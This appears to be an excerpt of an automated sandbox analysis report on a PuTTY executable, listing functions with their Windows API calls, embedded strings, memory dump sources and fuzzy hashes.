API ID: Text$DialogItemWindow
String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
API String ID: 4005798191-2223775202
Opcode ID: dd66e8fcdada4521eeb4f0184dec8b922e4a3f943bb6403dbdbdd79851093650
Instruction ID: 654860fb6ed579256a5452210584e833561b2603e76a0a2e64121393d66d22a5
Opcode Fuzzy Hash: dd66e8fcdada4521eeb4f0184dec8b922e4a3f943bb6403dbdbdd79851093650
Instruction Fuzzy Hash: 1BF0F636504145ABE6216A29EC89FFE7298EB46B25F2405BAF901D62C0DBE4CC824393

Function 00BA9AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(0000000F), ref: 00BA9AD5
SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BA9ADF
ReleaseDC.USER32(00000000), ref: 00BA9AEC

Strings

wgs.term_hwnd, xrefs: 00BA9AC6
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA9AC1

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ObjectPaletteReleaseSelectStock
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd
API String ID: 3714893027-833068605
Opcode ID: 7a90566a11580f7a02e90ca1e27d5ce408334397fbe3969211dd0c2fa5bc9311
Instruction ID: 596430d95bb9fec78f2fd7075b3031e9b0c1b21934fca7e8c0cedd2121df02fd
Opcode Fuzzy Hash: 7a90566a11580f7a02e90ca1e27d5ce408334397fbe3969211dd0c2fa5bc9311
Instruction Fuzzy Hash: 9CE01231545224BBEA246754BC0EFAE3A14EB06B65F01407AFA09A14E09EE10552E795

Function 00BBF860 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

ReleaseCapture.USER32 ref: 00BBF8C5
GetWindowPlacement.USER32(?,?,?,?,?,?,?,?,?,?,00BBE3DD,?,?,?), ref: 00BBF91F
SetWindowPlacement.USER32(?), ref: 00BBF93A
GetCapture.USER32 ref: 00BBF98C

Part of subcall function 00BAB600: DeleteFileA.KERNEL32(?), ref: 00BAB62A

Part of subcall function 00BE88E0: GetWindowLongA.USER32(00BBE3C9,0000001E), ref: 00BE8904

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$CapturePlacement$DeleteFileLongRelease
String ID:
API String ID: 2096018050-0
Opcode ID: 8b4dc0acb5aa55c6ce67d5da1755d22483cc852a1efb796856a945c8ad7e8922
Instruction ID: 2c6d34c38cc08082957a550621b00772c2f0a113b96cdd059a33e8ca75135416
Opcode Fuzzy Hash: 8b4dc0acb5aa55c6ce67d5da1755d22483cc852a1efb796856a945c8ad7e8922
Instruction Fuzzy Hash: 35310572604242BBF72157349C89BFE36E5EB86384F1844B9FC8846257D7B4C982C762

Function 00BA2147 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00BA2148
_strlen.LIBCMT ref: 00BA233A
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BA2355
_strlen.LIBCMT ref: 00BA2369
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BA237C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$GlobalLock
String ID:
API String ID: 2105387149-0
Opcode ID: 9ded3f95e6bfbcc16290cecf48b6ceb11a13ddc0308cd2656eb79b1846bb14d7
Instruction ID: 86eb9ced8aa2f37d4d4399a5d471f10cb4d8ae8bb1586d693e03ffb88ea50db6
Opcode Fuzzy Hash: 9ded3f95e6bfbcc16290cecf48b6ceb11a13ddc0308cd2656eb79b1846bb14d7
Instruction Fuzzy Hash: 23213AB29443043BE23027646C87F7B72DCDF93B64F044135FE099A2C2FA54AD1882EA

Function 00BA1666 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00BA1680
ImmGetCompositionStringW.IMM32(00000000,00000800,00000000,00000000), ref: 00BA1691
ImmGetCompositionStringW.IMM32(00000000,00000800,00000000,00000000), ref: 00BA16BB
ImmReleaseContext.IMM32(?,00000000,00000000,00000800,00000000,00000000), ref: 00BA23BA
DefWindowProcW.USER32(?,?,?,?), ref: 00BA3520

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CompositionContextString$ProcReleaseWindow
String ID:
API String ID: 1848772681-0
Opcode ID: e85d833057f3c33eb8c078e2b23c318c7c67e18974c4aa28ec67c9f21af3805d
Instruction ID: d8872e7d18ee85db1b7dde01bc44965770846768ded9aa54c61784389656f73b
Opcode Fuzzy Hash: e85d833057f3c33eb8c078e2b23c318c7c67e18974c4aa28ec67c9f21af3805d
Instruction Fuzzy Hash: A42138B16487086FFB303718DC86B3F32C9E793704F04847DF9458A282EAB95D49A791

Function 00C076A0 Relevance: 7.6, APIs: 5, Instructions: 76threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00C076E1
InitializeCriticalSection.KERNEL32(00CA53E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00C0773A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00C07748
CreateThread.KERNEL32(00000000,00000000,00C077A0,00000004,00000000), ref: 00C07772
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00C0777D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: 48d6aca9883a50f090e0d6f1a75787a76e1c15d038919ca722810f2fc7595a1a
Instruction ID: ecc63286bb0fefb66a210d98739e1ee9cba4699ac2fe104cb92c0f23986ebba1
Opcode Fuzzy Hash: 48d6aca9883a50f090e0d6f1a75787a76e1c15d038919ca722810f2fc7595a1a
Instruction Fuzzy Hash: CD216D75A80304AFE3209F25EC4AF0A7BF4EB45B44F104929FA459B2D0D3F0A504CB51

Function 00C073C0 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C07401
InitializeCriticalSection.KERNEL32(00CA53E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C0744A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C07458
CreateThread.KERNEL32(00000000,00000000,00C074B0,00000004,00000000), ref: 00C07482
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C0748D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID:
API String ID: 2660700835-0
Opcode ID: a5fe008c10e34d5c5c37d9cf0128b330e58c9b0a00f9bf57eaac811e16ec15e1
Instruction ID: da0f8d47d7fd906991a0292214197db764bc3c6a361efcfb32659995d01c11b9
Opcode Fuzzy Hash: a5fe008c10e34d5c5c37d9cf0128b330e58c9b0a00f9bf57eaac811e16ec15e1
Instruction Fuzzy Hash: 41217174684304AFE3209F24EC0AF4A7BF4AB49B59F10452DFA499B2E1D7F0B504CBA5

Function 00BE9EE0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104), ref: 00BE9F21
GetSaveFileNameA.COMDLG32(?), ref: 00BE9F53
GetOpenFileNameA.COMDLG32(?), ref: 00BE9F5C
GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00BE9F6E
SetCurrentDirectoryA.KERNEL32 ref: 00BE9F8A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CurrentDirectory$FileName$OpenSave
String ID:
API String ID: 3193246104-0
Opcode ID: 27eddb8d8b310f13fe9499956653fad287770b67819007c1f749a968e2ffb5bb
Instruction ID: 73fc2d1f74f0c812d5b48478ce4173f8827efefa03be885fa2ac350af738d084
Opcode Fuzzy Hash: 27eddb8d8b310f13fe9499956653fad287770b67819007c1f749a968e2ffb5bb
Instruction Fuzzy Hash: AF1101721483854BE3301B2998487DEBBE4DF86320F18059DEED5C73D2DBB4A855CAD1

Function 00BAAA20 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(000000F0), ref: 00BAAA2A
SetWindowLongA.USER32(000000F0,?), ref: 00BAAA89
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027,?,?,?,00BA2DC0,?,?,?), ref: 00BAAAA1
CheckMenuItem.USER32(00000180,00000000), ref: 00BAAABA
CheckMenuItem.USER32(00000180,00000000), ref: 00BAAAC9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$CheckItemLongMenu
String ID:
API String ID: 730651012-0
Opcode ID: 0f952eec93949774d173f0994380434624574dfe3892ec07bfd6b1195e0a2e37
Instruction ID: 68d6ef5fd3b67ffbae1e62eb457ef6e276895d023b1c0f0f82c6832809739139
Opcode Fuzzy Hash: 0f952eec93949774d173f0994380434624574dfe3892ec07bfd6b1195e0a2e37
Instruction Fuzzy Hash: B501D672A88120BBEA251B28FC2AF2C7E61E746726F200276FA55E61F0DE611811D794

Function 00BAA8F0 Relevance: 7.5, APIs: 5, Instructions: 25windowCOMMON

Download Yara Rule

APIs

IsZoomed.USER32(00BA3F15), ref: 00BAA8F6
GetWindowLongA.USER32(000000F0), ref: 00BAA908
IsZoomed.USER32 ref: 00BAA91B
SendMessageA.USER32(00008003,00000000,00000000), ref: 00BAA939
ShowWindow.USER32(00000003), ref: 00BAA94B

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: WindowZoomed$LongMessageSendShow
String ID:
API String ID: 4028103791-0
Opcode ID: 5b807d70ead58f02338f47d32a999f8f3bbb9b8df80547a7d2259d1cf0fc2740
Instruction ID: bfc05827679471d3d78f9f1d8e24a3462af5c55f36e72a659fdc6b1213f0aa2f
Opcode Fuzzy Hash: 5b807d70ead58f02338f47d32a999f8f3bbb9b8df80547a7d2259d1cf0fc2740
Instruction Fuzzy Hash: 1FF01B3424C111EFFF161F24ED2EB1D7A65F703755F21407ABA01D50F0DB619511DA19

Function 00C60942 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00C60AC2
__freea.LIBCMT ref: 00C60ADE

Strings

am/pm, xrefs: 00C60B42
a/p, xrefs: 00C60BA6

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: 237c4904504cca5c5105d53f6a05eef191c4aaa7f623df2cde22035b9053fa65
Instruction ID: 9ba5dc3529983061039eb5bf792cf5fe499baad92105688e5d4de953ebfcae31
Opcode Fuzzy Hash: 237c4904504cca5c5105d53f6a05eef191c4aaa7f623df2cde22035b9053fa65
Instruction Fuzzy Hash: 34C1D035900216DBDB388FA9C8C5ABBB7B0FF56704F384249E925BB251D331AE41DB61

Function 00BCB490 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON

Download Yara Rule

Strings

server subnegotiation: SB TTYPE SEND, xrefs: 00BCBA29
server subnegotiation: SB TTYPE <something weird>, xrefs: 00BCBAF5
client subnegotiation: SB TTYPE IS %s, xrefs: 00BCBA3F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID:
String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE <something weird>$server subnegotiation: SB TTYPE SEND
API String ID: 0-1023599780
Opcode ID: a531ab967377168ff159701cdf26b1931dcec6690f06d842e29bfb4168e69d78
Instruction ID: e4dcb0db0818d6733050e3a914ec1a91c4c9e00b97de54b2cdb49fb07f0feaaf
Opcode Fuzzy Hash: a531ab967377168ff159701cdf26b1931dcec6690f06d842e29bfb4168e69d78
Instruction Fuzzy Hash: 9DB10370A083459BD7109B28CC97F2EB7D5EB55314F1486AEF4968B3E2D332D841D7A2

Function 00BBF590 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBF800: SetWindowTextA.USER32(?,?), ref: 00BBF80F
Part of subcall function 00BBF800: GetWindowLongA.USER32(?,000000EC), ref: 00BBF821
Part of subcall function 00BBF800: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00BBF830

LoadIconA.USER32(000000C9), ref: 00BBF5CE
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BBF5DD

Part of subcall function 00BE9B40: GetDesktopWindow.USER32 ref: 00BE9B52
Part of subcall function 00BE9B40: GetWindowRect.USER32(00000000,?), ref: 00BE9B5E
Part of subcall function 00BE9B40: GetWindowRect.USER32(?), ref: 00BE9B70
Part of subcall function 00BE9B40: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,75BF3EB0,?,?,?,00BBDF7C,?), ref: 00BE9BBE

Part of subcall function 00BBFD60: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BBFD8B
Part of subcall function 00BBFD60: GetClientRect.USER32(?,?), ref: 00BBFD9D
Part of subcall function 00BBFD60: MapDialogRect.USER32(?), ref: 00BBFDC6

ShowWindow.USER32(?,00000001), ref: 00BBF753

Strings

Main, xrefs: 00BBF60D, 00BBF64E

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Window$Rect$LongMessageSend$ClientDesktopDialogIconLoadMoveShowText
String ID: Main
API String ID: 174503319-521822810
Opcode ID: e856f2955dc9e30f6d756363859b66858c602439c96880c944b8f66cf9606d12
Instruction ID: fc9f6f02160728e3eed447fcc3d977b5812ce4c16e1dc86583cb5906680c2765
Opcode Fuzzy Hash: e856f2955dc9e30f6d756363859b66858c602439c96880c944b8f66cf9606d12
Instruction Fuzzy Hash: 144129B5A00201FFD7116B25EC46F6B77E9EF44748F140478F94AA72A1EB62DA10C751

Function 00BEB6A0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BEB779

Strings

from , xrefs: 00BEB856, 00BEB86B
SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00BEB769
connected%s%s, xrefs: 00BEB86C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: from $SSHCONNECTION@putty.projects.tartarus.org-2.0-$connected%s%s
API String ID: 4218353326-1458757670
Opcode ID: 5a4cdab1f93c4dfec25b9a285b327d83d44609c01305e2e712ec272534faae62
Instruction ID: a6aa9f24976d5f865d5b3d1d114024b5bd604a5c15deaf056ce6e963a76b5bd7
Opcode Fuzzy Hash: 5a4cdab1f93c4dfec25b9a285b327d83d44609c01305e2e712ec272534faae62
Instruction Fuzzy Hash: 9A51A4F1A00340AFEB109F65DC46B57BAE8EF81304F1444BDEA4A9B342E775E905CB66

Function 00C63EAE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00C63DB4,?,?,00000000,00000000,00000000,?), ref: 00C63ED3
CatchIt.LIBVCRUNTIME ref: 00C63FB9

Strings

MOC, xrefs: 00C63EE5
RCC, xrefs: 00C63EED

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: a025284396044e5c3f3a30e0ff05fd66af18a22a8d4a727b5f0267b8ef900e29
Instruction ID: de94ae5639b669e0fb64980b1128c4cac8c2bf34e800ff339fc6d97b74fc7f63
Opcode Fuzzy Hash: a025284396044e5c3f3a30e0ff05fd66af18a22a8d4a727b5f0267b8ef900e29
Instruction Fuzzy Hash: 99417931D00249AFCF26DF98DD81AEEBBB5FF48304F184199F914A7261D3359A90DB92

Function 00BC3340 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32(?,?), ref: 00BC33BB

Strings

false && "no radio button was checked", xrefs: 00BC33D5
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c, xrefs: 00BC3387, 00BC33D0
c && c->ctrl->type == CTRL_RADIO, xrefs: 00BC338C

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ButtonChecked
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
API String ID: 1719414920-356531850
Opcode ID: 7f11a80edba067dca0ee5f316cafa3a0a852f9b47c88a0b331f8814b0e2f7a4f
Instruction ID: 2804fcd8d7a2181a60007e0536b867b9844ba698336f1c5dc28eeba539a8c327
Opcode Fuzzy Hash: 7f11a80edba067dca0ee5f316cafa3a0a852f9b47c88a0b331f8814b0e2f7a4f
Instruction Fuzzy Hash: 8B11CEB2700348EFD720AB58DD86F2637E5EFC1B15F4640B9E448D7252EB61ED048BA9

Function 00BCD98B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00BCDDFE

Strings

the -pwfile option can only be used with the SSH protocol, xrefs: 00BCDED3
unable to open password file '%s', xrefs: 00BCDFE0
unable to read a password from file '%s', xrefs: 00BCDE40

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strlen
String ID: the -pwfile option can only be used with the SSH protocol$unable to open password file '%s'$unable to read a password from file '%s'
API String ID: 4218353326-860164081
Opcode ID: e285a72eb3f8ae9ff383a8af0d8994c4c3ac772c4498ee885b8ad5f66d8a2c1e
Instruction ID: 76bc23093dd1e94a3229e338ff575eadff7b086f07b5847aa3abe75ca0476940
Opcode Fuzzy Hash: e285a72eb3f8ae9ff383a8af0d8994c4c3ac772c4498ee885b8ad5f66d8a2c1e
